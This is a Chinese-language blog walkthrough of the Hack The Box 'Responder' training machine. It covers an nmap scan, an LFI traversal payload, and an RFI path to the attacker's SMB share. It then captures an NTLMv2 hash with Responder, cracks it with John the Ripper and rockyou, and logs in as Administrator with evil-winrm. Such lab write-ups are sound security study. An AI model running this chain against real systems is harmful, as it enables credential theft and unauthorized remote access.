Hack the box: Responder
mango

惯例先扫一下

1
nmap -sC -sV -p- -T4 10.129.184.194
  • -sC:此选项启用默认脚本扫描。Nmap包含各种脚本,可用于在扫描期间执行各种任务,如检测常见漏洞、枚举有关目标的信息等。
  • -sV:此选项启用版本检测。Nmap将尝试确定运行在开放端口上的服务的版本。
  • -p-:这个选项告诉Nmap扫描所有的端口,而不仅仅是常见的端口。 -p- 表示扫描所有65535个端口。
  • -T4:这个选项设置扫描的速度/敏感度。-T4 表示设置为“Aggressive”模式,这意味着扫描速度较快,但也更容易被目标检测到。
image-20240128132727856

Task 1

被重定向到unika.htb.

添加到hosts文件

1
vim /etc/hosts
image-20240128133132583

正常访问

image-20240128133349577

Task 2

scripting language

在nmap的扫描结果可以发现是php

Task 3

语言,page

image-20240128133655887

Task 4

Local File Include (LFI)

../../../../../../../../windows/system32/drivers/etc/hosts

Task 5

Remote File Include (RFI)

//10.10.14.6/somefile

Task 6

NTLM stand for :

New Technology LAN Manager

基于挑战/应答的身份验证协议,是 Windows NT 早期版本中的标准安全协议。

Task 7

Responder 是一个在网络渗透测试和攻击中使用的工具,它可以用于执行 LLNMR(Link-Local Multicast Name Resolution)欺骗攻击,获取目标系统上的用户名和哈希密码。这个工具特别适用于局域网(LAN)环境。

具体来说,Responder 可以监听和响应 NetBIOS 响应请求,向目标系统发送伪造的 NetBIOS 响应,诱使目标系统发送验证请求,从而获取用户的 NTLMv2 哈希密码。这种攻击方式通常用于获取用户凭据,进行后续的横向移动或其他恶意活动。

image-20240128134641484

Task 8

John the Ripper

用于破解NTLM的哈希

Task 9

1
ifconfig
image-20240128135628905

监听本地网卡

1
responder -I tun0
image-20240128135512482

访问

image-20240128135741322

responder捕获了hash

image-20240128135831533

把获取到的hash保存到一个文件

image-20240128135936528

kali中自带了一些字典,都保存在/usr/share/wordlists,这里我们使用rockyou.txt

解压

1
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

使用john爆破,尝试许多不同的常见密码,看看是否有任何密码生成相同的质询响应,如果找到一个,我们就知道这就是密码。这通常被称为哈希破解

1
john --wordlist=/usr/share/wordlists/rockyou.txt hash
image-20240128140427831

得到了密码:badminton

Task 10

我们将使用Windows服务(即在盒子上运行)使用我们恢复的密码远程访问Responder机器。它监听哪个TCP端口?

nmap扫一下,5985

Task 11

要找flag了。5985搜索后可以得知有一款Windows远程管理Shell工具evil-winrm。这是一款远程渗透工具。教程可以看https://blog.csdn.net/w1304099880/article/details/106843786/

kali中已经自带了

这里我换了一个靶机,所以ip有变化。靶机ip为10.129.164.148

使用evil-winrm

1
evil-winrm -i 10.129.164.148 -u Administrator -p badminton
image-20240128143851953

翻一下

image-20240128143832594

参考:

https://daniel-schwarzentraub.medium.com/htb-tier-1-starting-point-responder-3ff5bca2a522

由 Hexo 驱动 & 主题 Keep
访客数 访问量